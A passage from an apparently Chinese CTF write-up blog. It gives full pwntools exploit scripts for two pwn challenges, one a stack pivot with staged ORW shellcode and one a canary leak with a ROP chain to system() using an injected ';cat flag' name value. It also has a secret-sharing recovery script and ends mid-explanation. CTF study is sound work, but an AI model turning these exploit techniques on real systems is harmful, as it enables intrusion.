\u5b57\u8282\uff1a<strong>\u6307\u9488<\/strong>\uff0c\u6307\u5411 <code>0x114514000<\/code>\u3002<\/li>\n\n\n\n<li><strong>FAKE_RBP<\/strong> \u8bbe\u7f6e\u4e3a <strong>0x114514000<\/strong>\u3002<\/li>\n\n\n\n<li>\u5f53 <code>main<\/code> \u6267\u884c <code>ret<\/code> \u65f6\uff0c\u5b83\u4ece <code>FAKE_RBP + 8<\/code>\uff08\u5373 <code>0x114514008<\/code>\uff09\u8bfb\u53d6\u5730\u5740\u3002\u8be5\u5904\u5b58\u653e\u7740\u6307\u9488 <code>0x114514000<\/code>\u3002<\/li>\n\n\n\n<li>\u4e8e\u662f\u7a0b\u5e8f\u8df3\u8f6c\u5230 <code>0x114514000<\/code>\uff0c\u5f00\u59cb\u6267\u884c Stage 1 Shellcode\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Stage 1 Shellcode \u529f\u80fd<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7531\u4e8e\u7a7a\u95f4\u53ea\u6709 8 \u5b57\u8282\uff0c\u6211\u4eec\u9700\u8981\u6781\u5176\u7cbe\u7b80\u7684\u6c47\u7f16\u4ee3\u7801\u3002<\/li>\n\n\n\n<li>\u5229\u7528 <code>push rsp; pop rsi<\/code> \u83b7\u53d6\u5f53\u524d\u6808\u6307\u9488\uff08\u6b64\u65f6\u6307\u5411 <code>0x114514010<\/code>\uff09\u3002<\/li>\n\n\n\n<li>\u8c03\u7528 <code>read(0, rsi, 255)<\/code> \u8bfb\u53d6\u540e\u7eed\u7684 Stage 2 Shellcode \u5230 <code>0x114514010<\/code>\u3002<\/li>\n\n\n\n<li>\u76f4\u63a5\u8df3\u8f6c\u5230 <code>rsi<\/code> \u6267\u884c Stage 2\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Stage 2 Shellcode<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u6807\u51c6\u7684 ORW (Open \/flag, Read, Write) Shellcode\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>4. PIE Leak<\/strong><\/p>\n\n\n\n<p>\u4e3a\u4e86\u6784\u9020\u6b63\u786e\u7684 Return Address (<code>base + 0x189b<\/code>)\uff0c\u6211\u4eec\u9700\u8981 PIE \u57fa\u5740\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7a0b\u5e8f\u5728 <code>print_gift_prompt_with_addrs<\/code> \u4e2d\u6cc4\u9732\u4e86 <code>main<\/code> \u51fd\u6570\u7684\u5730\u5740\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u8bfb\u53d6\u8be5\u6cc4\u6f0f\u5730\u5740\uff0c\u51cf\u53bb\u504f\u79fb <code>0x184f<\/code> \u5f97\u5230 PIE Base\u3002<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>import time<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'info'<br>binary_path = '.\/baby_stack'<br>\u200b<br>def get_process():<br> &nbsp; &nbsp;# return process(binary_path) <br> &nbsp; &nbsp;return remote('challenge.bluesharkinfo.com', 28923)<br>\u200b<br>def exploit():<br> &nbsp; &nbsp;# &nbsp; push rsp; pop rsi  -&gt; rsi = 0x114514010 <br> &nbsp; &nbsp;# &nbsp; mov dl, 0xff &nbsp; &nbsp; &nbsp; -&gt; Count = 255<br> &nbsp; &nbsp;# &nbsp; syscall &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  -&gt; read(0, 0x114514010, 255) (rax=0, rdi=0 assumed)<br> &nbsp; &nbsp;# &nbsp; jmp rsi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  -&gt; Jump to 0x114514010<br> &nbsp; &nbsp;#<br> &nbsp; &nbsp;# Bytes: 54 5e b2 ff 0f 05 ff e6<br> &nbsp; &nbsp;shellcode_s1 = b\"\\x54\\x5e\\xb2\\xff\\x0f\\x05\\xff\\xe6\"<br> &nbsp; &nbsp;payload_1 = shellcode_s1 + p64(0x114514000)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p = get_process()<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;p.send(payload_1)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.recvuntil(b\"DO YOU LIKE GIFT?\\n\")<br> &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp;leak_data = p.recv(6)<br> &nbsp; &nbsp; &nbsp; &nbsp;main_leak = u64(leak_data.ljust(8, b'\\x00'))<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;+] Leaked main addr: {hex(main_leak)}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;base_addr = main_leak - 0x184f<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;+] PIE Base: {hex(base_addr)}\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;target_ret = base_addr + 0x189b<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;+] Target Ret Addr: {hex(target_ret)}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;p.clean(timeout=0.1)<br> &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;-] Leak failed: {e}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;p.close()<br> &nbsp; &nbsp; &nbsp; &nbsp;return<br>\u200b<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;pivot_payload = b'A' * 264 + b'B' * 8 + p64(0x114514000) + p64(target_ret) + b'\\n'<br> &nbsp; &nbsp;p.send(pivot_payload)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;print(\"&#91;*] Payload sent. Waiting for Stack Pivot...\")<br>\u200b<br> &nbsp; &nbsp;print(\"&#91;*] Sending Stage 2 (ORW)...\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;orw = shellcraft.open('\/flag', 0)<br> &nbsp; &nbsp;orw += shellcraft.read('rax', 'rsp', 100)<br> &nbsp; &nbsp;orw += shellcraft.write(1, 'rsp', 100)<br>\u200b<br> &nbsp; &nbsp;p.send(b'\\x90'*16 + asm(orw))<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.interactive()<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Molly<\/h2>\n\n\n\n<p><strong>\u7a0b\u5e8f\u903b\u8f91<\/strong><\/p>\n\n\n\n<p>\u7a0b\u5e8f\u662f\u4e00\u4e2a\u7b80\u5355\u7684 2048 \u6e38\u620f\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Main \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u8f93\u5165\u540d\u5b57\uff0c\u5b58\u50a8\u5728\u5168\u5c40\u53d8\u91cf <code>buf<\/code> (0x404a40) \u4e2d\u3002<\/li>\n\n\n\n<li>\u6784\u9020\u6b22\u8fce\u5b57\u7b26\u4e32 &#8220;Hello, [name], &#8230;&#8221;\u3002<\/li>\n\n\n\n<li>\u8fdb\u5165\u6e38\u620f\u5faa\u73af <code>playgame()<\/code>\u3002<\/li>\n\n\n\n<li>\u6e38\u620f\u7ed3\u675f\u540e\u8c03\u7528 <code>final()<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Playgame \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u6b63\u5e38\u7684 2048 \u903b\u8f91\u3002<\/li>\n\n\n\n<li>\u8f93\u5165 &#8216;q&#8217; \u53ef\u4ee5\u9000\u51fa\u5f53\u524d\u5c40\uff0c\u4f46\u662f <code>score<\/code> \u4f1a\u51cf 10\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Final \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u68c0\u67e5\u5206\u6570\uff1a<code>if ( (unsigned int)score &lt;= 100000 )<\/code>\uff0c\u5982\u679c\u5206\u6570\u4e0d\u8fbe\u6807\u5219\u5931\u8d25\u3002<\/li>\n\n\n\n<li>\u5982\u679c\u5206\u6570\u8fbe\u6807\uff0c\u8fdb\u5165 <code>shell()<\/code> \u51fd\u6570\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Shell \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u4e00\u4e2a\u6a21\u62df\u7684 shell\uff0c\u652f\u6301 <code>ls<\/code> \u548c <code>exit<\/code>\u3002<\/li>\n\n\n\n<li>\u5b58\u5728 <strong>\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/strong>\uff1a<code>read(0, buf, 0x128uLL)<\/code>\uff0c\u800c <code>buf<\/code> \u5927\u5c0f\u53ea\u6709 144 \u5b57\u8282 (0x90)\uff0c\u4e14 Canary \u4fdd\u62a4\u5f00\u542f\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><code>score<\/code> \u662f\u4e00\u4e2a\u6709\u7b26\u53f7\u6574\u6570\uff08\u521d\u59cb 50\uff09\u3002\u6bcf\u6b21 &#8216;q&#8217; \u9000\u51fa\u51cf 10\u3002 \u5982\u679c\u5728 <code>final()<\/code> \u4e2d\u68c0\u67e5\u65f6\u88ab\u5f3a\u5236\u8f6c\u6362\u4e3a <code>unsigned int<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if ( (unsigned int)score &lt;= 0x1869F )<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u591a\u6b21 &#8216;q&#8217; \u5c06\u5206\u6570\u51cf\u81f3\u8d1f\u6570\uff08\u4f8b\u5982 -10\uff09\u3002 -10 \u7684\u8865\u7801\u8868\u793a\u4e3a\u65e0\u7b26\u53f7\u6574\u6570\u662f\u4e00\u4e2a\u975e\u5e38\u5927\u7684\u6570\u5b57\uff080xFFFFFFF6 = 4294967286\uff09\uff0c\u8fdc\u5927\u4e8e 100000\u3002 \u4ece\u800c\u7ed5\u8fc7\u5206\u6570\u68c0\u67e5\uff0c\u8fdb\u5165 <code>shell()<\/code>\u3002<\/p>\n\n\n\n<p>\u8fdb\u5165 <code>shell()<\/code> \u540e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Leak Canary &amp; RBP<\/strong>:\n<ul class=\"wp-block-list\">\n<li><code>buf<\/code> \u4f4d\u4e8e <code>rbp-0x90<\/code>\uff0cCanary \u4f4d\u4e8e <code>rbp-0x8<\/code>\u3002\u8ddd\u79bb\u4e3a 136 \u5b57\u8282\u3002<\/li>\n\n\n\n<li>Canary \u7684\u7b2c\u4e00\u4e2a\u5b57\u8282\u901a\u5e38\u662f <code>\\x00<\/code>\u3002<\/li>\n\n\n\n<li>\u53d1\u9001 137 \u5b57\u8282\uff08\u586b\u5145 136 \u5b57\u8282 + 1 \u5b57\u8282\u8986\u76d6 Canary \u7684 <code>\\x00<\/code>\uff09\uff0c\u5229\u7528\u7a0b\u5e8f\u7684\u8f93\u51fa\u529f\u80fd\u6cc4\u9732 Canary \u548c\u968f\u540e\u7684 RBP\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u6784\u9020 ROP<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u76ee\u6807\u662f\u6267\u884c <code>system(\"\/bin\/sh\")<\/code> \u6216 <code>system(\"cat flag\")<\/code>\u3002<\/li>\n\n\n\n<li>\u7a0b\u5e8f\u5f00\u542f\u4e86 NX\uff0c\u4e0d\u80fd\u76f4\u63a5\u6267\u884c shellcode\u3002<\/li>\n\n\n\n<li>\u5229\u7528 <code>pop rdi; ret<\/code> gadget \u8c03\u7528 <code>system<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u53c2\u6570\u6784\u9020\u6280\u5de7<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7a0b\u5e8f\u5f00\u5934\u8f93\u5165\u7684 <code>name<\/code> \u5b58\u50a8\u5728\u56fa\u5b9a\u5730\u5740\u7684\u5168\u5c40\u53d8\u91cf <code>0x404a40<\/code> \u4e2d\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u5728\u8f93\u5165\u540d\u5b57\u65f6\u6784\u9020 <code>;cat flag<\/code>\uff08\u6216\u8005 <code>;sh<\/code>\uff09\u3002<\/li>\n\n\n\n<li>\u5168\u5c40\u53d8\u91cf\u5185\u5bb9\u53d8\u4e3a <code>Hello,;cat flag,...<\/code>\u3002<\/li>\n\n\n\n<li>\u8c03\u7528 <code>system(0x404a40)<\/code> \u65f6\uff0cshell \u4f1a\u5148\u5c1d\u8bd5\u6267\u884c <code>Hello<\/code>\uff08\u547d\u4ee4\u672a\u627e\u5230\uff09\uff0c\u7136\u540e\u6267\u884c <code>;<\/code> \u540e\u7684 <code>cat flag<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'debug'<br>\u200b<br>pop_rdi = 0x40133e<br>ret_gadget = 0x40133f<br>system_plt = 0x401170<br>buf_addr_global = 0x404a40 <br>\u200b<br>def exploit():<br> &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp;# r = process('.\/ez2048')<br> &nbsp; &nbsp; &nbsp; &nbsp;r = remote('challenge.bluesharkinfo.com', 23585)<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"input your name\\n&gt;\")<br> &nbsp; &nbsp; &nbsp; &nbsp;r.sendline(b\";cat flag\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"Press \\\"Enter\\\" to start the game\")<br> &nbsp; &nbsp; &nbsp; &nbsp;r.send(b\"\\n\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;for i in range(5):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r.send(b'q\\nc\\n')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"start a new round\\n&gt;\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;r.send(b'q\\nQ\\n')<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"here is your shell\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"$ \")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;payload_leak = b'A' * 137<br> &nbsp; &nbsp; &nbsp; &nbsp;r.send(payload_leak)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"executing command: \")<br> &nbsp; &nbsp; &nbsp; &nbsp;leak_data = r.recvuntil(b\"command not found\", drop=True)<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"$ \")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;if leak_data.endswith(b'\\n'):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_data = leak_data&#91;:-1]<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;if len(leak_data) &lt; 137 + 7:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;log.error(\"Leak failed\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;return<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;canary_fragment = leak_data&#91;137:137+7]<br> &nbsp; &nbsp; &nbsp; &nbsp;canary = b'\\x00' + canary_fragment<br> &nbsp; &nbsp; &nbsp; &nbsp;log.success(f\"Canary: {canary.hex()}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;rbp_fragment = leak_data&#91;137+7:]<br> &nbsp; &nbsp; &nbsp; &nbsp;if len(rbp_fragment) &gt; 8:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rbp_fragment = rbp_fragment&#91;:8]<br> &nbsp; &nbsp; &nbsp; &nbsp;saved_rbp = u64(rbp_fragment.ljust(8, b'\\x00'))<br> &nbsp; &nbsp; &nbsp; &nbsp;log.success(f\"Saved RBP: {hex(saved_rbp)}\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = b'A' * 136<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += canary<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(saved_rbp)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(pop_rdi)<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(buf_addr_global) <br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(ret_gadget) &nbsp; &nbsp; <br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(system_plt)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.sendline(payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.interactive()<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp;log.error(f\"Error: {e}\")<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Image_is_all_you_need<\/h2>\n\n\n\n<p>\u89e3\u9898\u8fc7\u7a0b\u5206\u4e3a\u4e24\u6b65\uff1a\u9996\u5148\u5229\u7528\u5bc6\u7801\u5b66\u77e5\u8bc6\u6062\u590d\u51fa\u5b8c\u6574\u7684\u9690\u5199\u56fe\u7247 <code>secret.png<\/code>\uff0c\u7136\u540e\u5229\u7528 AI \u6a21\u578b\u4ece\u4e2d\u63d0\u53d6\u51fa Flag\u3002<\/p>\n\n\n\n<p><strong>\u7b2c\u4e00\u6b65\uff1a\u6062\u590d Secret \u56fe\u7247<\/strong><\/p>\n\n\n\n<p><strong>\u903b\u8f91\u5206\u6790<\/strong><\/p>\n\n\n\n<p>\u901a\u8fc7\u9605\u8bfb <code>share_secret.py<\/code>\uff0c\u6211\u4eec\u53d1\u73b0\u5b83\u5b9e\u73b0\u4e86\u4e00\u4e2a\u57fa\u4e8e\u6a21 257 \u57df\u7684 Lagrange \u63d2\u503c\u79d8\u5bc6\u5171\u4eab\u65b9\u6848\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u52a0\u5bc6\u8fc7\u7a0b<\/strong>\uff1a\n<ul class=\"wp-block-list\">\n<li>\u50cf\u7d20\u503c $P$ \u4e0e\u591a\u9879\u5f0f $f(x)$ \u7ed3\u5408\uff1a$S_i = (P + f(i)) \\pmod{257}$\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e\u8ba1\u7b97\u7ed3\u679c\u4e3a 256 \u7684\u7279\u6b8a\u60c5\u51b5\uff08\u56e0\u4e3a\u56fe\u7247\u662f uint8\uff0c\u6700\u5927 255\uff09\uff0c\u811a\u672c\u5c06\u5176\u5b58\u4e3a 0\uff0c\u5e76\u5c06\u4f4d\u7f6e\u7d22\u5f15\u8bb0\u5f55\u5728 PNG \u7684 <code>tEXt<\/code> \u5757\u4e2d\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u89e3\u5bc6\u601d\u8def<\/strong>\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8bfb\u53d6 6 \u5f20\u56fe\u7247\u7684\u50cf\u7d20\u6570\u636e\u3002<\/li>\n\n\n\n<li>\u8bfb\u53d6\u6bcf\u5f20\u56fe\u7247 <code>tEXt<\/code> \u5757\u4e2d\u7684\u989d\u5916\u4fe1\u606f\uff0c\u5c06\u5bf9\u5e94\u4f4d\u7f6e\u7684\u50cf\u7d20\u8fd8\u539f\u4e3a 256\u3002<\/li>\n\n\n\n<li>\u5bf9\u6bcf\u4e2a\u50cf\u7d20\u4f4d\u7f6e\uff0c\u5229\u7528 6 \u4e2a\u70b9\u7684 $(x, y)$ \u5750\u6807\uff08$x$ \u4e3a 1~6\uff0c$y$ \u4e3a\u50cf\u7d20\u503c\uff09\uff0c\u4f7f\u7528 Lagrange \u63d2\u503c\u516c\u5f0f\u8ba1\u7b97 $x=0$ \u5904\u7684\u503c\uff0c\u5373\u4e3a\u539f\u59cb\u50cf\u7d20\u503c\u3002<\/li>\n\n\n\n<li>\u6a21\u8fd0\u7b97\u9700\u8981\u5728 mod 257 \u4e0b\u8fdb\u884c\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>\u6062\u590d\u811a\u672c<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import png<br>import numpy as np<br>from PIL import Image<br>import os<br>\u200b<br>def read_text_chunk(src_png):<br> &nbsp; &nbsp;reader = png.Reader(filename=src_png)<br> &nbsp; &nbsp;chunks = reader.chunks()<br> &nbsp; &nbsp;chunk_list = list(chunks)<br> &nbsp; &nbsp;for chunk_type, chunk_data in chunk_list:<br> &nbsp; &nbsp; &nbsp; &nbsp;if chunk_type == b'tEXt':<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data = chunk_data<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if b'\\x00' in data:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;keyword, text = data.split(b'\\x00', 1)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;decoded = text.decode('utf-8', errors='ignore')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;decoded = data.decode('utf-8', errors='ignore')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if decoded.startswith('&#91;') and decoded.endswith(']'):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;return eval(decoded)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue<br> &nbsp; &nbsp;return &#91;]<br>\u200b<br>def modInverse(n, mod):<br> &nbsp; &nbsp;return pow(int(n), mod - 2, mod)<br>\u200b<br>def solve():<br> &nbsp; &nbsp;n = 6<br> &nbsp; &nbsp;mod = 257<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u8bfb\u53d6\u7b2c\u4e00\u5f20\u56fe\u83b7\u53d6\u5c3a\u5bf8<br> &nbsp; &nbsp;img1 = Image.open(\"secret_1.png\")<br> &nbsp; &nbsp;data1 = np.asarray(img1)<br> &nbsp; &nbsp;shape = data1.shape<br> &nbsp; &nbsp;num_pixels = data1.size<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;pixel_data = np.zeros((n, num_pixels), dtype=int)<br> &nbsp; &nbsp;extras = &#91;]<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;print(\"Loading shares...\")<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;fname = f\"secret_{i+1}.png\"<br> &nbsp; &nbsp; &nbsp; &nbsp;extras.append(set(read_text_chunk(fname)))<br> &nbsp; &nbsp; &nbsp; &nbsp;img = Image.open(fname)<br> &nbsp; &nbsp; &nbsp; &nbsp;pixel_data&#91;i] = np.asarray(img).flatten()<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;print(\"Reconstructing...\")<br> &nbsp; &nbsp;Y = pixel_data.copy().astype(int)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u6062\u590d 256 \u7684\u503c<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;if extras&#91;i]:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;indices = &#91;idx for idx in list(extras&#91;i]) if idx &lt; num_pixels]<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Y&#91;i, indices] = 256<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;# Lagrange \u63d2\u503c x=0<br> &nbsp; &nbsp;xs = list(range(1, n + 1))<br> &nbsp; &nbsp;coeffs = &#91;]<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;numerator = 1<br> &nbsp; &nbsp; &nbsp; &nbsp;denominator = 1<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if i == j: continue<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;numerator = (numerator * (0 - xs&#91;j])) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;denominator = (denominator * (xs&#91;i] - xs&#91;j])) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;li0 = (numerator * modInverse(denominator, mod)) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;coeffs.append(li0)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;recovered = np.zeros(num_pixels, dtype=int)<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;term = (Y&#91;i] * coeffs&#91;i]) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;recovered = (recovered + term) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;recovered = recovered.astype(np.uint8).reshape(shape)<br> &nbsp; &nbsp;Image.fromarray(recovered).save(\"recovered_secret.png\")<br> &nbsp; &nbsp;print(\"Saved recovered_secret.png\")<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;solve()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u540e\u5f97\u5230 <code>recovered_secret.png<\/code>\u3002<\/p>\n\n\n\n<p><strong>\u7b2c\u4e8c\u6b65\uff1aAI \u6a21\u578b\u63d0\u53d6 Flag<\/strong><\/p>\n\n\n\n<p><strong>\u6a21\u578b\u5206\u6790<\/strong><\/p>\n\n\n\n<p><code>Steg<\/code> \u6587\u4ef6\u5939\u4e2d\u7684\u4ee3\u7801\u5c55\u793a\u4e86\u4e00\u4e2a\u57fa\u4e8e <strong>Invertible Neural Network (INN)<\/strong> \u7684\u67b6\u6784\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u7ed3\u6784<\/strong>\uff1a\u6a21\u578b\u7531\u591a\u4e2a <code>INV_block<\/code> \u7ec4\u6210\uff0c\u8fd9\u662f\u4e00\u79cd\u7c7b\u4f3c RealNVP \u7684\u8026\u5408\u5c42\u7ed3\u6784\uff0c\u5177\u6709\u5929\u7136\u7684\u53ef\u9006\u6027\u3002<\/li>\n\n\n\n<li><strong>\u524d\u5411\u8fc7\u7a0b (Encode)<\/strong>\uff1a\u8f93\u5165 <code>Cover<\/code> \u548c <code>Payload<\/code>\uff0c\u8f93\u51fa <code>Stego<\/code> (y1) \u548c <code>Residual<\/code> (y2)\u3002\u4ee3\u7801\u4e2d\u53ea\u4fdd\u5b58\u4e86 <code>y1<\/code> (<code>secret.png<\/code>)\uff0c\u4e22\u5f03\u4e86 <code>y2<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u9006\u5411\u8fc7\u7a0b (Decode)<\/strong>\uff1a\u4e3a\u4e86\u63d0\u53d6\u4fe1\u606f\uff0c\u6211\u4eec\u9700\u8981\u5c06 <code>y1<\/code> \u8f93\u5165\u7f51\u7edc\u7684\u9006\u53d8\u6362\u4e2d\u3002<\/li>\n\n\n\n<li><strong>\u7f3a\u5931\u7684 y2<\/strong>\uff1a\u7531\u4e8e <code>y2<\/code> \u4e22\u5931\uff0c\u4f46\u5728\u8bad\u7ec3\u826f\u597d\u7684\u9690\u5199\u7f51\u7edc\u4e2d\uff0c<code>y2<\/code> \u901a\u5e38\u670d\u4ece\u9ad8\u65af\u5206\u5e03\u6216\u63a5\u8fd1\u96f6\u3002\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u7528\u5168 0 \u6216\u968f\u673a\u566a\u58f0\u4ee3\u66ff <code>y2<\/code> \u8fdb\u884c\u9006\u53d8\u6362\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u9006\u5411\u811a\u672c\u5b9e\u73b0<\/strong><\/p>\n\n\n\n<p>\u539f\u59cb\u4ee3\u7801\u6ca1\u6709\u63d0\u4f9b <code>inverse<\/code> \u65b9\u6cd5\uff0c\u6211\u4eec\u9700\u8981\u5229\u7528 INN \u7684\u6570\u5b66\u6027\u8d28\u624b\u52a8\u5b9e\u73b0\u9006\u53d8\u6362\u3002<\/p>\n\n\n\n<p><code>INV_block<\/code> 